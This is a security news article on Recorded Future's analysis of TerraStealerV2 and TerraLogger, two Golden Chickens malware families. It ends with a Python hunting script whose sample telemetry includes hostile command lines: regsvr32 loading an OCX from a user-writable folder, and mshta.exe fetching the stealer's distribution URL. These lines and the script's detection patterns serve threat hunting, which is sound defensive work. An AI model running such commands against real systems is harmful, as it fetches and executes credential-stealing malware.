
Flow chart illustrating TerraStealerV2’s anti-analysis checks (Source: Recorded Future)
The Insikt Group at Recorded Future has detailed two newly discovered malware families linked to the infamous Golden Chickens (a.k.a. Venom Spider), a financially motivated threat actor known for its stealthy Malware-as-a-Service (MaaS) platform. The report, published on May 1, 2025, reveals TerraStealerV2 and TerraLogger as the latest additions to Golden Chickens’ expanding malware arsenal.
These malware strains build upon Golden Chickens’ legacy of modular cyberweapons like VenomLNK, TerraLoader, and TerraCrypt—tools that have been used in past high-profile attacks against British Airways, Newegg, and Ticketmaster UK.
TerraStealerV2 is an information stealer that targets browser credentials, cryptocurrency wallets, and browser extensions. Delivered as LNK, MSI, DLL, and EXE files, it abuses signed, Microsoft-supplied binaries such as regsvr32.exe and mshta.exe (so-called living-off-the-land binaries) to load and execute its payload, so the malicious activity runs under a trusted process name and is harder for endpoint tools to flag.
It cannot decrypt credentials protected by Chrome's Application-Bound Encryption (ABE), the protection Google introduced in mid-2024 that ties the browser's encryption key to a SYSTEM-level service, so a process merely running as the logged-on user can no longer recover the key through DPAPI alone. As the report explains: “TerraStealerV2 lacks support for decrypting Chrome ABE-protected credentials, indicating the tool is likely outdated or still under development.”
Yet despite this shortfall, TerraStealerV2 still exfiltrates whatever data is not ABE-protected and copies cryptocurrency wallet directories wholesale, uploading the haul to Telegram bots and to wetransfers[.]io, a lookalike of the legitimate WeTransfer domain fronted by Cloudflare. Both channels are worth hunting for: outbound connections to the Telegram Bot API (api.telegram.org) from a process that is not a messaging client, and any DNS or TLS activity involving the wetransfers[.]io domain.
TerraLogger is a standalone keylogger, the first the group is known to have developed. It captures keystrokes with a low-level keyboard hook and writes them, unencrypted, to files with generic names such as save.txt, f.txt, and a.txt under C:\ProgramData. Those names are common enough in benign software that the path and filename are a hunting pivot rather than a standalone alert; the tell is a process writing keystroke content to them.
“TerraLogger represents the first observed use of a keylogging capability in malware developed by Golden Chickens,” the report notes.
The malware currently contains no command-and-control (C2) or exfiltration logic. Given the group's consistently modular design, it is either still in development or meant to be paired with another Golden Chickens component that handles transport.
Golden Chickens also appears to be refining its delivery chain by combining VenomLNK lures with payload execution through Windows-native tools. One observed sample even overlaps with known ClickFix infrastructure, using .lnk files disguised as .mp4 videos that are launched via mshta.exe.
“Across all observed cases, the TerraStealerV2 OCX payload was retrieved from the URL wetransfers[.]io/v.php… and executed via regsvr32.exe,” the report explains.
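As an added hunting example (not code from the Recorded Future report or from Golden Chickens' tooling), the following Python turns the observables described above into rules run over constructed Sysmon-style process-creation and file-creation events: regsvr32.exe executing an OCX fetched from wetransfers[.]io/v.php, mshta.exe launching remote content, .lnk files disguised as .mp4 videos, and TerraLogger's plaintext logs in C:\ProgramData. The key=value event format, the sample command lines and file paths, the user-writable directory list and the media-extension list are assumptions made for the example, not details from the report.

```python
"""Added hunting example: not code from the Recorded Future report or from any
Golden Chickens tooling. It applies the TerraStealerV2 / TerraLogger behaviours
the article describes to constructed Sysmon-style events (ID 1 = ProcessCreate,
ID 11 = FileCreate), written here as simple key=value lines."""
import ntpath
import re

# Indicators taken from the article
TERRALOGGER_FILES = {"save.txt", "f.txt", "a.txt"}        # plaintext keystroke logs
TERRALOGGER_DIR = r"c:\programdata"
TERRASTEALER_URL = re.compile(r"wetransfers\.io/v\.php", re.I)

# Assumptions for the example (not from the article): directories a dropper
# typically writes to, and media extensions used for double-extension LNK lures
USER_WRITABLE = (r"c:\programdata", r"c:\users\public", r"\appdata\local\temp", r"\downloads")
MEDIA_EXT = (".mp4", ".mov", ".avi")
URL_RE = re.compile(r"https?://\S+", re.I)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """'EventID=1 Image=... CommandLine="..."' -> dict; values may be quoted."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def rules_for(ev):
    """Return the names of every hunting rule the event matches."""
    hits = []
    image = ntpath.basename(ev.get("Image", "")).lower()
    cmd = ev.get("CommandLine", "")
    cmd_l = cmd.lower()
    target_l = ev.get("TargetFilename", "").lower()

    if ev.get("EventID") == "1":                          # ProcessCreate
        if image == "regsvr32.exe":
            # regsvr32 normally registers a module under System32 or Program
            # Files; a URL argument or a module in a user-writable path is the
            # pattern behind the report's "OCX payload ... executed via regsvr32.exe"
            if URL_RE.search(cmd) or any(d in cmd_l for d in USER_WRITABLE):
                hits.append("regsvr32_suspicious_module")
        if image == "mshta.exe" and URL_RE.search(cmd):
            hits.append("mshta_remote_content")           # ClickFix-style launcher
        if TERRASTEALER_URL.search(cmd):
            hits.append("terrastealer_v2_url")            # known distribution URL
    elif ev.get("EventID") == "11":                       # FileCreate
        head, name = ntpath.split(target_l)
        if head == TERRALOGGER_DIR and name in TERRALOGGER_FILES:
            hits.append("terralogger_plaintext_log")
        stem, ext = ntpath.splitext(name)
        if ext == ".lnk" and stem.endswith(MEDIA_EXT):
            hits.append("lnk_masquerading_as_media")      # clip.mp4.lnk and friends
    return hits


def scan(lines):
    """Map each rule name to the log lines that triggered it."""
    findings = {}
    for line in lines:
        for rule in rules_for(parse_event(line)):
            findings.setdefault(rule, []).append(line)
    return findings


# Constructed sample telemetry (not real logs); command lines and paths are illustrative
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s C:\Users\Public\v.ocx"',
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s C:\Windows\System32\vbscript.dll"',
    r'EventID=1 Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe https://wetransfers.io/v.php"',
    r'EventID=11 Image=C:\Users\bob\AppData\Local\Temp\update.exe TargetFilename=C:\ProgramData\save.txt',
    r'EventID=11 Image=C:\Windows\explorer.exe TargetFilename=C:\Users\bob\Documents\a.txt',
    r'EventID=11 Image=C:\Users\bob\AppData\Local\Temp\7z.exe TargetFilename=C:\Users\bob\Downloads\clip.mp4.lnk',
]

if __name__ == "__main__":
    for rule, matched in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(matched)} event(s)")
        for line in matched:
            print("   ", line)
```

The second regsvr32 line and the a.txt written under the user's Documents folder deliberately produce no hit: the rules key on where the module or log file lives, not on the binary or filename alone, which keeps the ProgramData check usable as a pivot rather than a noisy alert.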
Despite the limitations of their current versions, both malware families are part of a broader evolution of Golden Chickens' malware suite. According to the report: “Ongoing development activity… suggests these tools may still be maturing… their deployment is expected to remain closely aligned with Golden Chickens’ historical use of stealth-oriented malware to support financially motivated operations.”